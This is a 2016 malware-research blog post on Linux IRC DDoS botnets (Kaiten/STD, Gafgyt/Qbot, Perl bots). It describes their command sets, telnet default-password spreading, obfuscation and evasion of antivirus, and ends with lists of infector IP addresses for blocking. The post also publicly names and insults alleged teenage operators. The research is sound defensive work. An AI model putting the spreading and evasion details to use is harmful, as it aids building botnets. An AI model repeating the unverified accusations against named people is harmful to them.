Sunday, February 7, 2016

MMD-0052-2016 - Overview of "SkidDDoS" ELF++ IRC Botnet

Tag: kaiten, ktx, tsunami, STD, stdbot, torlus, Qbot, gayfgt, lizard, lizkebab, sinden, sdn, $dn, bossaline, bossabot, dtool, aidra, lightaidra, zendran, styx, Code, Robert, cod, unixcod, styxcod, irc, ircbot, ddos, elfbot, ddoser, nix, elf, linux, unix. backdoor, syn flood, ack flood, ntp flood, udp flood, dns amp, xmas attack, pan flood, x00, cback, LiGhT, Proxseas, BLJ, KaitenBot, fairy, Alex, vanity, Code, Palkia, shenron, GoHack, triple6, 666

Have your own idea, bring your dreams into reality.
Have some fun when you're young, it's all fair with consequentiality.
But you build malware to do vandalism, you cross the line,
Then you hack internet boxes for whatever purpose, it is a crime,
Don't do the crime, if you can't do the time.

Background

This post is a collection of information for the infection of the ELF & Perl malware botnet that is being used for DDoS activity. Our intelligence "snagged" the source codes that we share and reported to the antivirus and security industry in the previous MalwareMustDie blog post [MMD-0044-2015]. Some recent ELF compiled binary were coded with a slight obfuscation or with poorly "crypted" effort (obviously because the actors are kids and lacking of knowledge and experience because they are skipping school so much and too lazy to learn), even the toughest crypted one are so crackable and you can figure it easily using the source code pattern I shared.

In the bottom of this post there is a list of IP addresses which are infector hosts, that was recorded in the early 2016 only, those are: (1) The nodes from "grey" hoster hired by DDOS skiddies to spread these ELF which are mostly offered in some hacking forums, (2) Hacked server/routers/IoT/VPS that is being used to spread these ELF malware. Nonetheless, those are bad hosts that either should be blocked before it gets a take-down, or to be cleaned up. The IOC generation or blocking rules based on this list is highly recommendable.

(Pic = A spreader's attack log of an ELF botnet infection)

The intelligence for this information can not be disclosed further for the security purpose, the data belongs to the MalwareMustDie, NPO (thank you to a hard work for ELF Team team mate) bound to our disclaimer. Yet please feel free to use these information freely for your mitigation work or extract IOC to prevent these infection gone worst, or for research purpose.

(Pic = A spreader instruction for copypasta to SSH infect and confirming infection of ELF botnet)

For the notes: There is no malicious infection of malware can be occurred by viewing this post, information posted are all in the textual form and was modified in a way that will prevent the link to outside, so it is harmless, further, this blog is hosted on Google blog (thank you blogger.com) infrastructure and not in our own servers, and there is no advertisement hat so ever in this blog to avoid any chance for third party links to avoid malicious effort from our "unhappy" enemies.

What is the source of these infection

For the ELF type of DDoS malware or botnet used, there are two major versions used: kaiten/ktx/tsunami/STD modded base malware and Torlus(LizKebab/GayFgt/Bashdoor/Bashlite) type. The rest are the Perl "SERVIDOR" (Perl DDoS Bot, or, aka Pbot) malware with having same purpose: IRC protocol basis remote DDoS command and control scheme to launch DDoS attack, backdoor activity and further infection. In the next sections I will give you some real samples and sources of this threat that I often tweeted in my timeline.

In this post, the scheme that is used, the actors and some details of these botnets are also informed. Along with some recent obfuscation used. With these background hopefully we can make a better scheme to reduce its spread, to detect the payload with a better score from antivirus products supporting Linux platform, and to law enforcement forces to recognize which routes of badness that is adrenalized these hacks.

1. Kaiten/Ktx/Tsunami/STD backdoor/ddos/IRC botnet malware

Long explanation about ELF/Kaiten(Tsunami) I wrote it in here-->here.

The recent popular and interesting sample is the kaiten-like botnet called itself as STD bot, for the STD bot historical explanation please refer to this link-->here, explaining why I always said STD bot is not Kaiten(Tsunami), from the root of its coded. But in time, the code was heavily copypasta with kaiten bot added code..vise-versa..so, in the end, what many people see now looks almost the same codes between both threats.
Figure: TheSTD bot saved variable to connect to CNC (noted: "key" & "pass"), shared for takedown knowhow purpose.

The encoded version of ELF/STD bot (kaiten-like family)

There was a chance to find the "Encoded Version" of STD bot, which was successfully decoded as per below video (press the menu in the youtube video for the binary forms of BEFORE and AFTER decoding)

Obviously the original code are untouched, well..after all those hacker actors (further will be mentioned as "skids" short of script kiddies, or "SkiDDoS" since the purpose of them is in onto DDoS activity) in majority can't code much in C and live in copypasta (activity to copy code/paste from others without having any process via "brains") land. You'll see many part matched to original STD bot code..
Again..see previously source codes shared to you all in the link above, as reference.

And here's its CNC communication PoC and CNC botnet access details for this version:

Plenty of this "obfuscation" versions are spotted in the wild:

Several combination that might have seen

We find a creativity from SkiDDoS who could code a bit, to improve the ancient code to be more interesting with the recent additional features with the purpose to: (1) obfuscate the threat indicator, (2) evade the DDoS attack logic to evade blocking/mitigation, (3) for improvement of the main functionality from the ancient works..

Below is the other variation with Xmas attack..

Some even using message (again) "copypasta" from Japan anime Bakemonogatari:

This type is having several modification by changing strings to make the ELF looks like a weird botnets..which is a camouflage of STD bot copypasta too..

Since this type is very interesting, at the time it was spotted, due to its low detection ratio, it successfully infecting several routers actually, so I wrote special post for this due to some requests and an on going infection in MMD-0052-2016, link-->here.

The Sharky type of STD bot

This type is a modded (sort of "modified") STD bot in recent code, compiled in "usual" way. The actor tend to use STDbot (sometimes along with some script basis IRC botnet), He usually serves all CNC (InspireIrcd) and the bot client spreader in a one single IP address, mostly is compromised server (but sometimes via some hosters too, rarely).

This is the sample of the Sharky type-->here. And the picture below is explaining how the STD botnet protocol works during the infection, the picture also contains important information as tip/hint on how to dissect this type of ELF botnet generally.

2. What good guys call: GayFgt/GafGyt/Bashdoor/Bashlite, is what these punks call it as Torlus, LizKebab or Qbot

This malware firstly launched in a big scale during the shellshock, in September, 2014. First detected by @yinette in-->here and discussed in-->here and then I analyzed and report it in virus total comment in-->here, and made repository for the malware in kernelmode-->here. That time I wasn't sure to blog the threat, we call it firstly bash0day malware and then switch to bashdoor as name, to then now all of us call it as per they wanted to be called "GayFgt", as per hard coded keyword in the binary. In the dark side of the web they call it as Torlus to then Lizard Kebab/LizKebab, along with "other" names to avoid researcher's radar until now..

Unlike the Tsunami descendants which is very dependable to existence of IRC server's CNC and protocol, Torlus/LizKebab/GayFgt(etc) is using client-and- server set with its own hard-coded protocol fully inspired by the IRC basis commands (why they even call it IRCmain () function). Many influences the coder to implement this malicious, for example, it is adapting the Perl bot function used automatic scanner for telnet aiming first infection for the vulnerable linux box with the default passwords.

Picture of on-going telnet scanner/bruter recorded by Norse, see which country was aimed..

On a scheme of infection (one sample),the binaries and the range of the scanning can be viewed as per pasted in here [link]. Telnet scanning works will be followed by the infection to the routers using default passwords set in the codes, which is defined in three group of fields of code: [root], [login users] and the [login passwords].

Telnet scanning launched after forking started, upon establishing the torlus/gayfgt server connection:


Figure: Wide-range IoT & routers default login/passwords for telnet bruteforce attack used by one Torlus actor in his compiled malware

This malware has various DDOS options, but it is not as much as STD or Kaiten. Because of the dual functions of the malware which are: functionality as the "spreader" and the "flooder". The flood attack for this malware is shown as per below picture:

for the further logic please refer to the source code shared previously.

The origin of the Torlus

This is the original "comment/opinion" taken from the coder of this malware when asked about this threat:

The Original Command List written by the coder of this botnet:

Even there is a tutorial made by the coder:

Pastebin is highly useful, isn't it skid?

This is the picture of gayfgt/torlus's coder bragging his owned nix boxes to get the "buyer"

Well..it seems he was breaking his own rule about screenshots.. :)

The details intelligence information of the coder can be found in here-->here.

Torlus/LizKebab, the "Qbot" version:

A group of ELF botnet is using service based on GayFgt to what they call it as "Qbot":

You may wonder why using "Qbot" as names. Seriously, there's nothing special about that, but, since the name of GayFgt (this is the strings used to confrm an infection), Torlus or Lizkebab was published openly in the wide web, yet the bunch of actors need to communicate to each other to mention this particular malware, so they just made up a name of "Qbot" as reference, along with other names that they use.

Another reason is, while the author was releasing the code of torlus, the telnet scanning part was having a slight bug that can be fixed only by skiddos who can code a bit of C or is having a legit contact with the coder, so..Qbot is how the skiddos mention the version which is free of the initial bug.

Unlike the initially released Torlus (the lizkebab) that were hitting a lot of server devices vulnerable to the bash shellshock, which were mostly servers or client computer with bash running, this version is meant to aim routers or IoTs with the multiple platform of binaries. Since the shellshock were patched from most of the vital services, the IoT are the leftover to have either that vulnerability along with the insecure default user/passwords unset during deployment, and mostly telnet services are open too. So the chance to hit routers/IoT is getting big, and it is important to have a big nodes of botnet to have a powerful flood DoS power for these skiddos.

More illustrated [details1 and details2] on this infection (aims routers in USA landscape)

Another illustration;
A skiddos botherder from US (ISP: ComCast) known as nickname of PacketRate was bragging his collected Qbot modified version and promoting the sales its service as "SwatNet" with the below screenshot:

Even the size of botnet controlled by this kid is 14.5k, it's considerably smaller compared to veteran herders. As Qbot is aiming servers and routers, could be our device is owned by this kid. And all of this for the DDoS purpose..

Additional illustration: One real case of GayFgt(Torlus) was designed specifically to infect routers with hacking its busybox as per posted in kernelmode-->here.

A skiddos called himself "TheVillain" launch promotion for DDoS as Service by selling spot of his Qbot:

Torlus/Lizkebab/GayFgt/Bashdoor without Telnet scanning

One day Xylit0l informed me to look at kernelmode on a Gayfgt case, which lead to this version. This one has no telnet scanner on its setup. I found this version was the private version code basis. The actor seems avoiding the "noise" of traffic in telnet scanning & bruting. Our intelligence also found it matcged to a modified version that was announced by the coder in his "private club". So it runs as backdoor and act with the 100% remote DDoS bot function. Below is the code screenshots:

I disassembled as below:

For more detail of this version please see posts in-->here.

Torlus/Lizkebab/GayFgt's server console in action

I call it "in action" because this is actually a copypasta modified Torlus server side renamed as "Palkia", the picture was snagged directly from skiddos who bragged about this:


BLJ and the Torlus/Lizkebab/GayFgt/Bashdoor/Bashlite in encoded form

Playing around with this new sample-->sample thread=16&t=3505#pr28248 to find out that the hacktivists has obfuscated the strings in the ELF of Torlus/Lizkebab/GayFgt/Bashdoor/Bashlite malware. Thank you for a good person who send this sample directly to us.

This piece of malware was coded based on original Torlus client inside of those garbled codes, it was in encoded/string-obfuscated form, w/stripped and distributed with no intel architecture samples ..it's fine for all of us:-) since my major reverse engineering is for UNIX embed device anyway.

The "encoding" goes on both side: the client and server version.

After decoded and all strings loaded in memory, the functionalities will run as usual, here's the telnet scanner part as per PoC below:

In this type of "crypted" version (example: the BLJ type sample-->here) is also the persistent model of Torlus by its installation as autostart in user's crontab.

Tip to all good folks who on reversing some of these crypted variant in the future: The point of differences are as follows: 1. the forks was run before decrypt, 2. syscall stripped but all are torlus' ones . 3. Some hint: Aiming the args which they never can hide. 4. Put them back together& you'll see torlus/lizkebab/gayfgt code as per it is.

For the decryption of GayFgt/Torlus/LizKebab BLJ crypted version, I made a guide/hint video that hopefully can help others dissecting this version:
*)Noted: See this video in fullscreen & HD mode

The LINUX version of AV has bad detection ratio:

A message to skids who use this version: "Try harder! :)"

The Linux/GayFgt distribution via vulnerable WebApps also exists

Most of the infection used for GatFgt or Kaiten are using hacked credential for the linux boxes, however, it is not always like that. We spotted the first large distribution in September 2014 during the bash exploitation "shellshock", after that default credential for busybox was aimed, later on they started to aim all platform of the IoT with its default credential, which then they are also hack FTP accounts with weak credential, and recently the CMS/WebApps with vulnerabilities are aimed too to spread these ELF malware, one proof is the case we took screenshot on Wordpress hacked site:

3. The infamous legendary "Servidor" family IRC Perl DDoS bot (Pbot)

We all seeing this threat for a long time but recently this DDOS script is heavily used as "alternative" to infect IoT for DDOS purpose, in case that the ELF malware can not be run nor executed in the targeted platform by the hackers. Here's the proof in-->here

Historically. Perl bot DDoS IRC (in short: known as PBot), is not a new problem, and we can see much of them in the compromised sites or FTP servers. I cover about those in previous post about FTP adventure in-->[-1-] and [-2-]. Even though it seems there are many types of them, but the do-able codes are only two or three, others are basically just a combination "copypasta" of those codes. Even though the threat of Perl DDoS is old, the recent findings are having much "improvement" for the distribution and usage, for protection of the player on controlling their bots, along with camouflaging purpose avoiding the online scanning tools.

Why Perl? Why not PHP or else like Python or Ruby? Some routers need a CGI to operate as user's interface, and many of routers distribution (still) prefer to have Perl interpreter for that interfacing language. Thus most of the servers are having Perl for execution of scripts in maintenance level, say: /etc/init.d/update-rc.d for example. I am not checking down to its statistic details yet, but there were so many infection hitting IoT and servers in Perl backdoor instead of ELF during the shellshock boom era. Shortly, if ELF doesn't run, Perl bot might do the job, that was why they still use this type of bot, as a companion or even the main course. And in addition, it doesn't take much effort to modify Perl script for a skiddos actor.

One major type of this Perl DDoS bot is the "Servidor" type, which was originally coded with Portugese language made variables and comments. Some typical parts of this Perl DDoS is as per snipped below:

This version was used, being in "plastic surgery" to look like some other original made, and modified with many new "copypasta" functions, to look something like below picture, which the copypasta actor/coder named it as Perl DDoS IRC bot or other generic variant names.

The thing about the perl code is, they are readable, so what the hacktivists do is to obfuscate the text part as much as possible to hide it's server's information. In this case is the usage of the "hexed text" for obfuscation. And other variation (not so many) of obfuscation are also spotted too.
A snippet code for the threat:

The flexibility obfuscation of the "servidor" Perl IRC DDoS botnet (PBot) as the backdoor has a very long history too, for another example: after PHPMyAdmin (PMA) remote execution exploitation was found & in the wild, the GayFgt/Torlus coder was in purpose releasing a Tutorial to setup a PMA exploit botnet in PHP toolkit, with advising a download package contains Perl script to be executed as per instructed in the tutorial.

What was not said in the tutorial is.. during the execution, another base64 encoded "unmentioned" component file, which is actually containing the "Servidor" Perl Bot (PBot) code will be executed too, and that was obviously made to backdoor the person who was actually using the tutorial. Servidor (Pbot) and/or in general: "IRC botnet", was proven as flexible and as easy to use for hacking/backdoor purpose. Here's the screenshot of that code:

How PerlBot/Pbot was applied as backdoor in the PHP botnet toolkit to hack PMA sites..skiddos are rude is it? :)

The example CNC of these perl IRC botnet is as per shown in the picture below when the owner of large perl botnet call himself "GoD" bragged his stuff:

A set of infection for these "servidor" Perl DDoS'er is as widely applicable as the ELF Torlus(GayFgt) or ELF Kaiten/STD has. The SkiDDoS can set the attacker's IP (they call it as "spreader") to a certain IP while using the Perl DDoS payload together with some ELF's one in the other IP and all of the (Perl & ELF) can use & share the same CNC in another IP too. They (skids) like to switch or combine between those IP, and it is important for us to clean up all of the used nodes in a chain of infection. Below is a real case data of such scenario:

If you spotted such type of script please try to get the below information:


Which is valuable information to "secure" such compromised/cnc-utilized servers.

There are also other type of Perl DDoS scripts that are privately distributed between "fellow hacker team mate" only, which were specifically built for the desired flood combination attacks that was thought "effective" by the coder/user's preference, the below Perl script is the example for it:

*) Note: See the "skype" part in the code. You think what I am thinking?

Some crooks in Lizard Squad, despite of using their ELF DDoS (GayFgt/Torlus/LizKebab) is also having their own private version of Perl DDoS script that seems are coded for the public usage for any other skiddies to use it during a mass operation they made to flood a certain big services, this simple script is one of the tool used during their "adventures", it is a simple coded in perl but I think you can imagine how big flood traffic that can be generated by bunch of kids (says.. 30 kids which each kids is having says 3-4 boxes bots) if firing this script in their boxes via CLI of Perl:

4. Screenshots of "other" ELF IRC ddos variants with same basis

There are plenty more of ELF malware threat derived from the IRC basis client-server code. I will give some example of what was "hot" in the market and these samples were spotted and handled in the wild during our mission in MalwareMustDie helping to stop usage of ELF malware, in example:

MuBot, DTool, Lightaidra, Bossabot/Line's tools, below is the screenshots:

Just for the record only, a little out of context: During the investigation accidentally found that Anonymous hacktivists are also have their own original DDoS tool, but that was coded in Visual Studio .NET Framework with Visual Basic :-))

Well, it seems that they put harder effort in scripting its ASCII art than the coding itself :D

Essay: Why "kaiten/tsunami" IRC botnet family is (still) popular now?

The kaiten/Tsunami malware C code is openly shared in many exploit database sites for long. The origin of kaiten.c was coming from knight.c, coded firstly by Bysin (to then known as Contem) in around between 1999 (or earlier maybe) to 2000. The history of the kaiten is as per explained in here-->here. It is like a handbook for the youth hackers or skids to code and build any IRC bot in this and previous generation. I asked many times to put those codes to be taken down, since I see there are plenty of kaiten/tsunami variant codes that are evolving and hacktivist's malware coders are making some modification to add more features to it everyday. This malware is used in some known groups now... Right now kaiten/tsunami-base malware is already widely shared and improved, so to take the intial source code down now it is just meaningless anyway..

What had happened now: Most powerful DDoS that is hitting us daily today are these ELF botnets, via utilizing our NIX boxes and IoT devices to be used against us. The flexibility of this tool is high, you don't need to have root access to run these malware, and since it is coded in C, you can mostly compile them on-the-spot by your own downloaded preferred compilers to bypass the NIX system mitigation scheme of using the own native builder. We have a boom of trace for these incidents started during the shellshock era, but back then the variant was not as much as now, which we are having about 6++ families (Kaiten/STD/Aidra/LightAidra/BossaLine/Dtool/Torlus or LizKebab)and around 17 variants of codes in the wild, old and new.

The usage of the IRC bot is hiding the real actors connection with the malware implemented in the victim's machine behind a specifically setup IRC server. This is the advantage for those hackers. The bad actor just have to stealthy connect from any different network to that IRC server, which is an IRC server prepared for a botnet operational purpose, and wait until the "spread method" infected bot nodes automatically join the IRC authenticated channel. The spreading ways are varied, some are aiming busybox devices with hammering its credential for login, or using other malware to hack the telnet like GayFgt/Torlus/Lizkebab.

The hacker then can start to remotely control the activity in the victim's machine, to send via IRC protocol the commands that will execute malicious procedures coded in each (specific) malware.

Those commands sent are a simple "IRC message" specific textual visible keywords like: ATK (UDP|SYN|STD|XMAS|PAN), PING, SCAN, SHELL, BCONNECT, MAIL etc etc.. which can mean something like: multiple form DDoS attacking another nodes, scanning for infecting more nodes, getting the shell of the infected machine to be used as backdoor, getting updates, sending messages and many other malicious routines.
These keywords will be received and processed by the ELF malware to run the desired bad activity.

For the DDoS function itself, it seems that DDoS Stresser Services based on GayFgt/Torlus then Kaiten/Tsunami are proven hit harder than similar kinds written in Perl, PHP, Python or Windows DDoS (what so called LOIC long time ago..) client or even Chinese made DDoSer malware. The flexibility in arrangement and renting its service per "channel" in their IRC server is the key of its "easy-selling", and for people who can do IRC chat means they are able to operate via these bots to hit whichever targets they are planning to.

The most painful part of a malware coder is maybe in creating the CNC communication protocol.. in IRC bot they don't have to create that protocol, since IRC is and providing its protocol for the communication, and Tsunami code is having it all and a De Facto "open source".

The code of these malware is also simple and among hackers who are mostly sharing its source codes, any specific modification can be done by them self who know a bit about C network programming with TCP/IP and know about IRC protocol.

At this point please don't get me wrong, I am not speaking highly on any malware and you know me well how I hate malware, but IRC channel base DDoS is the threat that we all should start to raise more attention and priority..now, or it's going to be too late.

In the nutshell where there is no "hacker" who is connected to internet without not hiding their real IP connection, the setup of the IRC botnet is "heaven" to avoid the direct trace during investigation upon incidents to gather evidence collective effort caused by it. The only way to spot the attacker is to get into the IRC server and get the information from that vector only, under some conditions: IF the data is saved or parsed in there, or.. if we can gain full access to the host served by the IRCd server, if these conditions met then most likely we will only see some bunch of IP addresses camouflaged in VPN or Tor connectivity. Yet, there is still some know-how that can done to compromise the CNC server to beat the actors "by their own game" with a method that I can not disclose further for our own OPSEC reason.

The IRC server used itself, they "mostly" use two versions for this purpose (inspircd or unrealircd), can be implemented lightly in any VPS (rented or hacked ones), or in hack *NIX boxes or routers or IoT that were previously hacked and used for this purpose. the security for it is exists, they can auth the allowed connection, the server login, the channel to connect and the specific IRC accountS (noted: plural) to be master/slave for the botnet operation. They can setup a hostname in DNS that points to the IRC server for changing its IP within each session of infection and/or using the real IP to setup server-client set of infection itself.

Many scheme can be done. Better yet, the setup for servers to connect in kaiten/tsunami code is just unlimited.

So, actually this is a powerful scheme, that is being digged into its utmost usage right now, a light-weight basis botnets for building and re-building, to code and re-code it again and again, and it is an flexible/easy/useful tool for bad people to compromise then utilizing our nodes, specially if IoT nodes are aimed and being targeted. The telnet or ssh scanner function is also spotted in some variants used to spread more nodes too for infection. In some incidents I faced, the attacker will certainly choose to install his prepared ELF Tsunami IRC bot for the backdoor / hack purpose along with other hacktool like rootkits.

Moreover, due to the ELF malware detection ratio is not as high as other form of executable, a simple stripping, packing, obfuscating and encoding for the ELF build itself will surely drop the detection ratio into a very minimum. THIS is the fact that you must know. As you can see all Anti Virus are depending on samples 100% in detecting these ELF. Not like with windows malware when they virus protection can have sandboxing or behavior analysis as add-value to detection.

To produce tsunami/kaiten ELF malware to attack IoT in multiplatform CPU is not that difficult, with the same code all bad guys need is just a cross compiler that can compile you samples to support most of IoT processor architecture or operating systems. As proof, below is the sample of recent detected version explaining what architecture of router's processor that is really on target now:

or..
Then please ask yourself, how many anti virus that can work in overall platform aimed by these malware? The most effective protection scheme is filtration out-f-the-box for this threat,

I think this additional section is explaining much of worries due to this type of malware for the present and the future. We are ignoring a simple code, and laugh about it. And becoming weak by our ignorant/arrogant attitude. DO NOT under estimate any threat. Bad people are always lurking us, and they are learning our weakness well. I bet they read this post and try to comprehend this writing more than good people would too.

In the recent hack using tsunami/kaiten case, some researchers laugh about the actor was using tsunami as backdoor. I feel sad reading that. Again, that is an unnecessary arrogance. If you can laugh and think is that "easy", then go and get the actual bad guy's ID from the trace of its backdoor then, which is actually way too difficult actually under the scheme described above.

This is what the bad guys are actually thinking while choosing ELF/Tsunami tool; "Who will need a "savvy" backdoor if a simple IRC botnet code can do the job well?"

Who used or coded such malware? The h"E"cktivists? No, these are kids!

I am in purpose disclosed publicly the coders and users of kaiten and STD bot, since they are doing their malicious activities opoenly in twitter platform as his one communication tool between crooks.. the same platform that we have our family use and communicate with friends. You should know this.

below is the disclosure details:

OZN, the Canadian kid punk (Ouch!) who coded some kaiten basis botnet and herders of thousands:

This is the coder's picture:

This coder is Canadian citizen (Ouchh!), a kid, his ID, location, real name and evidence related his activity on new DDoS activity in "Shenron Stresser" (Ouch!) which its environment has already reported to the law enforcement. If you still think THIS-->(link) kid is innocent, see the captured communication below:

The customers of this coder are the actors who distribute those malware into hacked routers/IoT/VPS/servers for the DDoS attack cannons. One of the "customer is still active EVEN TODAY, a Netherlands punk-boy "AntiChrist (aka: Reverser/NoHacker/Nixman(+his some avtive handle names in twitter)" [LINK for report => HERE and HERE] known as the lizard DDOS stresser admin [Proof => HERE] , one of the lizard (read: loonies) squad hacker gang activists, responsible for many DDOS attack efforts and hacking incidents.


Another botnet coder-->here, and a kaiten bot herder-->here, and then a user/actor-->here, and his comrade actor-->here.

And also another IRC ELF malware herder using kaiten, if you see the above picture-->here ..well, this is the guy responsible, his botnet ELF payloads is known well with the "BLJ" or "Dongs" initial..

I think many ELF malware researchers seeing this type already too :-)

Please note the description of "Security Enthusiast", or "Developer" is used in his profile, as many of other skiddos used to use such "Reverser", "Malware Analyst/Researcher" and "Security Beginner" attributes. FYI: Clodflare service is the heaven for these punks to park, AntiDDoS service used by DDoSer..what an irony..

..by the way, talking about Cloudflare was used protecting DDoS attacker service, see below↓

These kids are showing off openly of what they are doing in herding their botnets, like the one with the twitter profile below:

↑This UK boy (from Ballymena city) is showing off in his twitter profile (Ouch!!) the ELF botnets entering the CNC of IRC server actually, let's see that picture in close up:

It is showing the multiplatform ELF Linux malware botnet client malware that successfully infected the target and making a callback to the IRC botnet server, it is showed clearly with the name of platform sent via the chat protocol shown in the picture as ARM, MIPS, SH, etc. You will be very surprised if you see how young the picture of this kid is..

One more skiddos, a young boy from US, even openly use GitHub and PasteBin for his own developed code to DDoS, hack BusyBox routers/IoTs, and other offensive codes:

Don't ever believe if was said such codes (see below) are used for the "research" purpose..

The actor's information is as per below, pic can be seen here-->Ouch!

...and we have nailed ID of more actors (i.e. Ouch!) (we counted 12+ more ID data are successfully collected now). The majority of these actors are kids "gone wild". Their parents are not controlling (nor caring) to what they are doing anymore, and they think if they cover their traces well the law can not touch them since they are only a (masked) "naive young children".

For the IOC The report of infection from 1st Jan - Feb 7th 2016 (warning: it is outdated)

1. The summary:

Malware binary types: ELF/multiple architecture
Malware type: GayFgt(LizKebab), Kaiten (STD/Mod)
Suspected actors: Lizard Stresser rings, aka: Sindicate, "Loony" Squad, and so on.
Total attempts: 1,158
Main download method: wgxt
Alternative download: cuxl; xxtch ; xxx-xxwnload
Download source per country:
  ------------------------
  No  Country      Count
  ------------------------
  1.  United States  39
  2.  Netherlands    12
  3.  United Kingdom 4
  4.  Latvia         3
  5.  France         3
  6.  Ukraine        1
  7.  Romania        1
  8.  Singapore      1
  9.  Poland         1
  10. Sweden         1
  11. China          1
  12. Russian        1
  13. Germany        1
  14. Moldova        1
2. Interactive Map:

a

Powered by my friend's (JC SoCal's cool GIPC)

3. CSV GeoIP Database:

107.172.23.133, Buffalo, 14221, United States, 42.9864, -78.7279
158.69.205.212, Pasadena, 91124, United States, 33.7866, -118.2987
158.69.217.211, Pasadena, 91124, United States, 33.7866, -118.2987
162.208.8.203, Glenview, 60025, United States, 42.0855, -87.8247
162.213.195.144, Austin, 78751, United States, 30.3106, -97.7227
163.47.11.201, Singapore, - , Singapore, 1.2931, 103.8558
173.208.196.202, Kansas City, 64106, United States, 39.1068, -94.566
173.214.160.90, Secaucus, 07094, United States, 40.7801, -74.0633
173.242.119.122, Clarks Summit, 18411, United States, 41.4486, -75.728
176.123.29.105, Chisinau, - , Moldova Republic of, 47.0056, 28.8575
178.19.111.244, Tarnowskie Gory, 42-600, Poland, 50.4485, 18.8515
185.112.249.111, Coventry, CV1, United Kingdom, 52.4167, -1.55
185.112.249.253, Coventry, CV1, United Kingdom, 52.4167, -1.55
185.112.249.26, Coventry, CV1, United Kingdom, 52.4167, -1.55
185.130.5.200, - , - , - , Latvia, Lithuania, 56.00, 24.00
185.130.5.205, - , - , - , Latvia, Lithuania, 56.00, 24.00
185.130.5.246, - , - , - , Latvia, Lithuania, 56.00, 24.00
185.17.30.239, - , - , Russian Federation, 55.75, 37.6166
185.29.9.253, Stockholm, 173 11, Sweden, 59.3333, 18.05
185.52.2.114, - , - , Netherlands, 52.3667, 4.9
185.62.189.11, - , - , Netherlands, 52.3667, 4.9
185.62.190.156, - , - , Netherlands, 52.3667, 4.9
185.62.190.253, - , - , Netherlands, 52.3667, 4.9
185.62.190.62, - , - , Netherlands, 52.3667, 4.9
192.227.170.67, Buffalo, 14221, United States, 42.9864, -78.7279
192.227.177.120, Buffalo, 14221, United States, 42.9864, -78.7279
192.227.177.127, Buffalo, 14221, United States, 42.9864, -78.7279
192.243.109.128, Glenview, 60025, United States, 42.0855, -87.8247
192.243.109.5, Glenview, 60025, United States, 42.0855, -87.8247
198.12.97.67, Buffalo, 14221, United States, 42.9864, -78.7279
198.12.97.93, Buffalo, 14221, United States, 42.9864, -78.7279
198.23.238.203, Buffalo, 14221, United States, 42.9864, -78.7279
198.23.238.215, Buffalo, 14221, United States, 42.9864, -78.7279
198.23.238.251, Buffalo, 14221, United States, 42.9864, -78.7279
199.180.133.178, Kansas City, 64106, United States, 39.1068, -94.566
199.180.133.214, Kansas City, 64106, United States, 39.1068, -94.566
199.231.184.237, Secaucus, 07094, United States, 40.7801, -74.0633
206.72.207.194, Secaucus, 07094, United States, 40.7801, -74.0633
208.67.1.142, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.165, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.2, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.3, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.40, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.52, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.73, Kansas City, 64116, United States, 39.1472, -94.5735
208.67.1.88, Kansas City, 64116, United States, 39.1472, -94.5735
208.73.207.236, Secaucus, 07094, United States, 40.7801, -74.0633
208.89.211.111, Kansas City, 64106, United States, 39.1068, -94.566
208.89.211.141, Kansas City, 64106, United States, 39.1068, -94.566
216.158.225.7, Secaucus, 07094, United States, 40.7801, -74.0633
218.104.49.211, - , - , China, 35.0, 105.0
23.227.163.110, - , - , United States, 38.0, -97.0
23.89.158.69, Los Angeles, 90017, United States, 34.053, -118.2642
23.94.29.218, Buffalo, 14221, United States, 42.9864, -78.7279
31.14.136.142, - , - , Romania, 46.0, 25.0
45.32.232.197, Amsterdam, 1000, Netherlands, 52.35, 4.9167
46.101.71.240, London, EC4N, United Kingdom, 51.5142, -0.0931
5.196.249.163, - , - , France, 48.86, 2.35
51.254.212.84, - , - , France, 48.86, 2.35
51.254.238.19, - , - , France, 48.86, 2.35
64.20.33.134, Secaucus, 07094, United States, 40.7801, -74.0633
74.118.193.239, Clarks Summit, 18411, United States, 41.4486, -75.728
79.143.181.158, - , - , Germany, 51.0, 9.0
80.82.64.177, - , - , Netherlands, 52.3667, 4.9
89.248.162.171, - , - , Netherlands, 52.3667, 4.9
89.248.166.131, - , - , Netherlands, 52.3667, 4.9
93.171.158.242, Khmelnitskiy, - , Ukraine, 47.7278, 34.1372
94.102.49.197, - , - , Netherlands, 52.3667, 4.9
94.102.53.144, - , - , Netherlands, 52.3667, 4.9
94.102.63.136, - , - , Netherlands, 52.3667, 4.9

4. CSV Network Routing Databse

107.172.23.133,"biz.kcscleaning.net".  ,36352 , 107.172.20.0/22 , AS-COLOCROSSING , US , nwnx.net , New Wave Netconnect LLC
158.69.205.212,"212.ip-158-69-205.net".,16276 , 158.69.0.0/16 , OVH , FR , parsons.com , Parsons Corporation
158.69.217.211,"211.ip-158-69-217.net",16276 , 158.69.0.0/16 , OVH , FR , parsons.com , Parsons Corporation
162.208.8.203 , - ,11878 , 162.208.8.0/22 , TZULO , US , vpscheap.net , VPS Cheap Inc.
162.213.195.144, - ,54540 , 162.213.195.0/24 , INCERO , US , inceronetwork.com , Incero LLC
163.47.11.201, - ,133165 , 163.47.8.0/22 , DIGITALOCEAN-AS , SG , digitalocean.com , Digital Ocean Inc.
173.208.196.202, - ,32097 , 173.208.128.0/17 , WII-KC , US , goldvipclub.com , Gold VIP Club
173.214.160.90,"scrubzei.com",19318 , 173.214.160.0/24 , NJIIX-AS-1 , US , interserver.net , Interserver Inc
173.242.119.122, - ,46664 , 173.242.119.0/24 , VOLUMEDRIVE , US , volumedrive.com , VolumeDrive
176.123.29.105,"176-123-29-105.alexhost.md",200019 , 176.123.0.0/19 , ASCLOUDATA , MD , alexhost.md , AlexHost SRL
178.19.111.244,"traderproject.com",59491 , 178.19.104.0/21 , LIVENET , PL , sitel.net.pl , SITEL Sp z o. o.
185.112.249.111, - ,42831 , 185.112.249.0/24 , UKSERVERS , GB , - , -
185.112.249.253,"pocztafoundation.swidnica.pl",42831 , 185.112.249.0/24 , UKSERVERS , GB , - , -
185.112.249.26,"no.rdns.sharkservers.net",42831 , 185.112.249.0/24 , UKSERVERS , GB , - , -
185.130.5.200, - ,203569 , 185.130.5.0/24 , SILK , LT , - , Sindicate Group Ltd
185.130.5.205, - ,203569 , 185.130.5.0/24 , SILK , LT , - , Sindicate Group Ltd
